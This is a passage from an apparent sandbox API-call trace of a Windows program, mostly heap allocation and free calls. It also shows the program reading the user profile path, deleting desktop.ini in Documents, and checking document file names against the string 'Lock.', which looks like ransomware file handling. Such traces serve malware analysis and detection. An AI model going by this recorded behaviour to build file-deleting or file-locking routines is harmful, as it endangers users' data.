out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0261.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416e88 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0261.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0261.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0261.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0261.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0261.943] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0261.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0261.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0261.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0261.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0261.944] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0261.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0261.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0261.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0261.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0261.944] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0261.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0261.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0261.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0261.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0261.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0261.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0261.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0261.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0261.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0261.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0261.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0261.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0261.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x24202f0 [0261.946] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/desktop.ini", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", lpFilePart=0x8bedfc*="desktop.ini") returned 0x33 [0261.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0261.946] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini")) returned 0x26 [0261.946] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x1ae6, dwReserved1=0x4, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa5760 [0261.946] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini")) returned 1 [0261.947] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x1ae6, dwReserved1=0x4, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0261.947] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0261.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0261.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0261.947] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0261.948] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0261.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0261.948] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0261.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0261.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0261.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0261.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0261.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0261.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0261.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0261.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0261.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0261.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0261.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0261.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0261.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0261.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0261.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0261.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0261.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0261.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0261.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0261.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0261.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0261.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x24202f0 [0261.950] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/desktop.ini", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", lpFilePart=0x8bf658*="desktop.ini") returned 0x33 [0261.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0261.950] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini")) returned 0xffffffff [0261.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0261.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0261.951] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0261.951] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.951] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0261.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0261.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0261.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0261.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0261.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0261.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0261.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dKfh5A-JQm_Dx.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kfh5A-JQm_Dx.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fh5A-JQm_Dx.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h5A-JQm_Dx.docx", cchCount1=5, 